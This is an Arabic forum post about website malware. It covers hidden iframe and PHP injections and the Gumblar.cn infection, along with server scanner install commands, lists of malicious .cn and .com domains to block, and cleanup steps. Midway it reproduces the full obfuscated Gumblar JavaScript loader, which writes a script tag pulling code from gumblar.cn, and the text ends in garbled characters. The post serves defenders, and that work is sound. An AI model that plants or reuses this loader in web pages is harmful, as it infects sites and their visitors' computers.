<div><div align="center">فيروسات صفحات الانترنت ينتمى الى ما يسمى website exploits و هى المنتشرة اليوم فى الانترنت وهى الاكثر ذكاء فى الاستخدام فبعد ان كان الحق او التلغيم يتم بشكل يدوى فى اثبح الامر الان اكثر تطور وسرعة وايجايبة من حيث عمل الفيروسات
فيكفى ان يصاب موقع على سيرفر لاستضافة مشتركة حتى يبداء الفيروس فى العمل
المصدر الى الان صينى للفيرس وينقسم الى عدة انواع
ولاكن كيف يتنقل الفيروس و طريقة عمله هو او فيروسات exploits الاخرى ؟! ببساطة عند اصابت حاسوبك بالفيروس من خلال تصفحك لاحد المواقع المصابة فان الفيروس يخزن فى sqlsodbc.chm
ليبداء عمله فى جمع جميع البيانات المحفوظة فى متصفحك او الملفات المؤقتة لك لذا لا ننصح بعمل حفظ لكلمات المرور فى متصفحك وبمجرد استخدمك لملفات البى اتش بى ورفعها على موقعكم من جهاز مصاب فان الفيروس يزرع نفسه بتلقائية فى الملفات ليبداء فى الانتشار عن طريق متصفحى موقعك وهكذا ينتشر بسرعة شديدة كما انه ينتشر ايضا فى المواقع المضافة على نفس الخادم
وبالنسبة لاصحاب الخوادم لفحص وجود الفيروس على الخوادم اتبع الاتى :
يمكنكم تحميل الاسكربتات الاتية على سيرفرتكم وهى خاصة بتوب لاين من م / حسام
وشرح تركيب الاسكربت كالتالى :
رمز PHP:
wget http://www.mtwer.com/shro7at/VCleaner/vscan-v1.1.tar.gz
ثم فك الضغط
رمز PHP:
tar -xzf vscan-v1.1.tar.gz
ثم نقل الاسكربت الى هذا المسار
رمز PHP:
/bin
mv vscan /bin
ثم اعطائه تصاريح 755
رمز PHP:
chmod +x /bin/vscan
ثم ستقوم بتشغيله بالكتابه فى محث الشل فى اى مكان
رمز PHP:
vscan
[root@server ~]# vscan
وتابع معه الخطوات كما فى الصوره
[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/vscan1.jpg[/IMG]
للمزيد من المعلومات والاوبشنات كما فى الصوره
[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/vscan2.jpg[/IMG]
============
شرح وتركيب منظف الفايروسات الغير ثابت (داينامك) : Dynamic Virus Cleaner v1.1
طريقة التركيب مثل السابق لكن مع اختلاف اسمه الى dvscan
وهو مشابه للسابق كثير لكن بدل من ان تضع كود الفايرس كامل فى منطقة Put the virus code :
سوف تضع اسم الدومين فقط الموجود فى كود الفايرس مثل nyoflak.com فى مثال الكود السابق مثل الصوره التاليه
[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/dvscan.jpg[/IMG]
================================================== ========== ================
اليكم أهم انواع هذه الفيروسات :
اولا فيرس ****** :
هو فيرس يستخدم وسوم****** وهى من احد ادوات لغة html ويصيب الفيروس الزراير بالصفحات ولاكنه يصيب فقط الصحفات ذات الاسم المشهور ا ى index.html او index.php او Index.htm
وهكذا والجدير بالذكر ان اكثر من 95 % من المواقع المصابة بالفيرس تستخدم برامج تمت برمجتها باستخدام php
و ما يميز فيروسات ******s هو الاختفاء اى خاصية (hidden) فان قمت بمحاولة ان تكتب كود يحتوى ****** فسيظهر الكود بالصفحة بكل بساطة ولاكن الفيرس يتميز بالاختفاء فلن يتم اكتشافة بالعين ان لم يكتشفة مضاد الفيروسات
******s from .CN Domains :
وهو يستخدم وسوم ****** بصيغة Html عادية ويكون الشكل كالتالى :
يمكن ان يكون النطاق الموجوود بالكود المرفق اعلاه مختلف ولاكن جميعها ينتهى بـ
.cn
ورقم
ip
94 .247 .3 .150
لذا انصح بعمل حظر له من مدراء الخوام
وقد يختلف مسار تحميل الفيروس ولاكن جميعها بالشكل
“in.cgi?incomeNN”
وهذه قائمة باغلبية النطاقات الجاملة للفيروس :
lotultimatebet .cn
lotmachinesguide .cn
cheapslotplay .cn
lotultimatebet .cn
cutlot .cn
mediahousenameshopfilm .cn
betbigwager .cn
namebuypicture .cn
thelotbet .cn
hotslotpot .cn
mixante .cn
lotante .cn
superbetfair .cn
litecartop .cn
betworldwager .cn
litecarfinestsite .cn
homenameregistration .cn
litegreatestdirect .cn
playbetwager .cn
nameashop .cn
mainnameshop .cn
superlitecarbest .cn
internetnamestore .cn
dotcomnameshop .cn
mediahomenamemartvideo .cn
كيفية العثور والكشف على موقعك ومدر اصابته:
وكتابه موقعك ليعمل الموقع على الفحص وكتابة الروابط المصابة
وقامت عدة محركات بحث مثل الشهير جوجل بعمل حظر لبعض هذه المواقع وذلك للضرر المسبب له وهذا رسم يوضح ذلك :
كما انه من الجدير بالذكر ان هذا الفيروس يصيب ايضا ملفات Adobe Acrobat المحملة على موقعكم وملفات الفلاش swf
ولاكن قد تكون نسبة الاصابة قليلة نسبيا بالنسبة لاصابات ملفات html & php
والان طريقة تنظيف موقعك :
1- ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس 2- بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى 3- قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع 4- اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع Webmaster Tools 5- قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites ================================================== ========== ================
ثانيا : فيروس ****** (php exploit)
وهو نفس عمل السابق ولاكنه اكثر تطورا فى شكله حيث انه يدرج نفسه ضمن وسم php
وشكل الكود كالتالى :
رمز PHP:
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "";
echo "";
echo "";
?>
نلاحظ وجود نفس الكود السابق ولاكن مع تضمينه ضمن وسم php
والكود السابق من اصابة لمدونة wordpress
والتالى من اصابة لمجلة جملة الشهيرة
رمز PHP:
// Generate the page
//
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
echo "";
?>
وهذه قائمة النطاقات الحاملة للفيروس :
xtrarobotz .com
goooogleadsence .biz
internetcountercheck .com
google-ana1yticz .com
live-counter .net
nipkelo .net
hosttracker .net
durnosy .com
ibalefo .net
nyoflak .com
peskostruikaz .com
bukirda .com
thedeadpit .com
sefauro .net
vafuiek .com
deisvop .net
webexperience13 .com
beidzan .com
klaomta .com
quoasty .com
niklejo .net
ruisjop .com
nakulpi .net
clifedo .net
neglite .com
والان طريقة تنظيف موقعك :
ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس
بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع Webmaster Tools قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites ================================================== ========== ================
الان مع نوع اخر من الفيروسات وهو الشهير Gumblar.cn :
لا يعرف طرق انتشاره بالضبط, كما انه اكثر ذكاء خصوصا فى التعامل مع منتديات vBulletin فالفيروس لا يزرع فى الموقع بنفس الطريقة عن طريق زرع الكود فى ملف index فقط
بل يعتمد فى زرع الكود فى ملف config.php وعمل ملفات وهمية بها الكود فى مجلد Image باسماء مثل image.php فعند اصابة منتدى فان الفيروس تكون نسبة اصابته للجهاز اكبر لانه لا يظهر فقط فى الصفحة الرئيسية بل فى كل صفحات المنتدى نتيجة للزرع فى ملف الكونفج وهو الملف الاساسى للاتصال بقاعدة البيانات فعند طلب موضوع او رد او اى استعلام من القاعدة فان الفيروس يبداء فى العمل ويزرع نفسة فى الملفات حتى ان كانت مشفرة
1- و شكل الكود كالتالى :
رمز PHP:
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56er s"69on()+"22"2c
"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3 bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(
u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(doc umen"74"2e******"2e"69nde
x"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"
79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzr vzts"3d"22A"22"3b"65va"6c("22if
(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72 "22+"62"2ba+"22Minor"
22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu" 6de"6e"74"2ewr"69"74e("22"3csc"
72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3 d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d')
.replace(jil,xR5p)))})(/"/g);
1-1- والكود شرحه كالتالى : يببداء بدالة function
1-2- الدالة function غير مسماه وذاتية الزرع
1-3- طريقة التشفير غريبة لانه يتم استبدال الارقام الموجودة باوامر فعالة عند بداء عمل الفيروس
1-4- قرب نهاية الكود تجد دالة replace
2- عندما يعدم الاسكربت من الموقع الحامل للفيرس يقوم gumblar . cn/rss/” بتحميل تلقائى لفيرس جديد تلقائيا
3- يصيب الفيروس غالبا الملفات قبل وسم وان تكررت فى الصفحة الوسم قد يصيب الصفحة اكثر من مرة وقد حدث هذا اكثر من مرة
4- يختلف عن فيروسات ****** فى انه يصيب كل الصفحات وليس المساماة بـ index فقط
5-يصيب ملفات الجافا سكريبت .js وان كانت تحتوى على زراير فقد يصيب الفيروس كل زرار بالملف
6- قد يكون شكل الفيروس كالتالى
<div style="margin:20px; margin-top:5px"> رمز PHP:
<div class="alt2"> <div dir="ltr" style="text-align:left;"> <span style="color: #000000"><span style="color: #0000BB">
F ofJv D : tdv,shj hl,hru ,'vr h;jahtih ,hgplhdm lkih lk j,f ghdk